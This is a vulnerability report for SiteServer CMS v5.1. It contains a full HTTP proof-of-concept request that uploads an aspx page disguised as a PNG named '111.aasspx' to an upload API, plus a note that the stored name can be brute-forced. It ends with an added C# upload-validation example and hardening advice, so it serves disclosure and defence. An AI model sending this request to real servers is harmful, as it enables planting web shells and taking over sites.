Tested version: https://github.com/siteserver/cms/releases/download/siteserver-dev-v5.0.92/siteserver_install.zip
SiteServer: v5.1
Test environment: Windows 2012 R2
Database: SQL Server 2016
Vulnerable URL: /api/stl/actions/upload/1?type=GovPublicApply
(No system configuration of the application needs to be changed during testing.)
Request:
```http
POST /api/stl/actions/upload/1?type=GovPublicApply HTTP/1.1
Host: 192.168.39.3:8099
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------307288271314916491681521187278
Content-Length: 903
Origin: http://192.168.39.3:8099
Connection: close

-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="id"

WU_FILE_0
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="name"

111.png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="type"

image/png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="lastModifiedDate"

2021/10/15 上午10:47:51
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="size"

5720
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="upfile"; filename="111.aasspx"
Content-Type: image/png

<%@ Page Language="C#"%>
<% Response.Write("hello,world"); %>
-----------------------------307288271314916491681521187278--
```

The generated aspx file name is timestamp-based; in black-box testing it can be obtained by brute-force guessing.
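
The report above shows an upload named `111.aasspx`, declared as `image/png`, ending up stored as an aspx file under a guessable timestamp-based name. The following is an added example, not SiteServer's code and not part of the original report, of an upload check that rejects such a file instead of rewriting its name and that stores accepted files under a random name. The `UploadPolicy` class, its method names and the image-only allowlist are assumptions for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;

public static class UploadPolicy
{
    // Assumption: this endpoint only needs to accept images.
    static readonly HashSet<string> Allowed =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { ".png", ".jpg", ".jpeg", ".gif" };

    // Validate, never repair: returns a server-chosen stored name, or null to reject.
    public static string Accept(string clientName, byte[] content)
    {
        if (string.IsNullOrEmpty(clientName)) return null;
        // Refuse path separators, control characters and other invalid name characters.
        if (clientName.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0) return null;
        // Windows drops trailing dots and spaces, so check the name it would really create.
        string name = clientName.TrimEnd(' ', '.');
        string ext = Path.GetExtension(name);
        if (!Allowed.Contains(ext)) return null;      // allowlist on the final extension
        if (!LooksLikeImage(content)) return null;    // client-supplied Content-Type is not trusted
        // Stored name is random: not derived from the client name or the clock.
        return Guid.NewGuid().ToString("N") + ext.ToLowerInvariant();
    }

    static bool LooksLikeImage(byte[] b)
    {
        byte[][] magics = {
            new byte[] { 0x89, 0x50, 0x4E, 0x47 },    // PNG
            new byte[] { 0xFF, 0xD8, 0xFF },          // JPEG
            new byte[] { 0x47, 0x49, 0x46, 0x38 },    // GIF
        };
        return b != null &&
               magics.Any(m => b.Length >= m.Length && b.Take(m.Length).SequenceEqual(m));
    }

    public static void Main()
    {
        // File name and body taken from the request in the report.
        byte[] page = Encoding.ASCII.GetBytes("<%@ Page Language=\"C#\"%>");
        Console.WriteLine(Accept("111.aasspx", page) ?? "rejected");
        // Constructed sample: a PNG signature under an allowed extension.
        byte[] png = { 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A };
        Console.WriteLine(Accept("111.png", png) ?? "rejected");
    }
}
```

Serving the upload directory with script execution disabled is a separate control that still applies if a check like this is bypassed.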